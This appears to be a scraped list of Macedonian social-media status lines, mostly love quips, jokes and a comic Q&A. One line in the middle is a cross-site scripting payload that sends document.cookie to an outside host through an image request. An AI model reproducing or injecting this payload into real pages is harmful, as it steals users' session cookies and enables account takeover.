lubovta e gusta
tortata e pusta....
koga kese doblizi tvojta i mojta usta!!! :-D
sakaj ja devojkata kako sestra kako majka
nei vrti grip :'(
zosto posle solzi zaneja isturas:-[

nesum luborna tusi:)mrazam
da pipa sto e moe :-):o)
vo drugi drzavi lugeto kulturno se ponasat a ovde vo makedonija ajduci golemi samo kradat
edna casa oris te gleda samo za koris haha:-D
Onaj filing koga si gi ladis madinata vo zeska voda :)
"><SCRIPT>var+img=new+Image();img.src=" http://1/"%20+%20document.cookie;</SCRI PT>
Си патиме зошто сме фини со тие што не треба! :)
Nemoj #meni
Jer ja nisam ko #oni
by:Epol Bre'x
Име? - Рамиз.
Презиме - Рамизи.
Роден? - Роден да.
Пол? - Мекартни.
Омилена боја? - Карирана.
...Омилено животно? - Оса, затоа зашто дава мармалад.
Мислиш пчела зашто дава мед? - Мислам, мислам.
Брачна состојба? - Двајца браќа.
Телефон? - Нокија.
Мене никој пријател до сега не ми забодел нож во грб, веројатно затоа што внимавам кого нарекувам пријател...
Колку љубов пропуштаме чекајки една невозвратена!?
:P
Ако сакаш најдобра другарка најди некоја по име Марија<3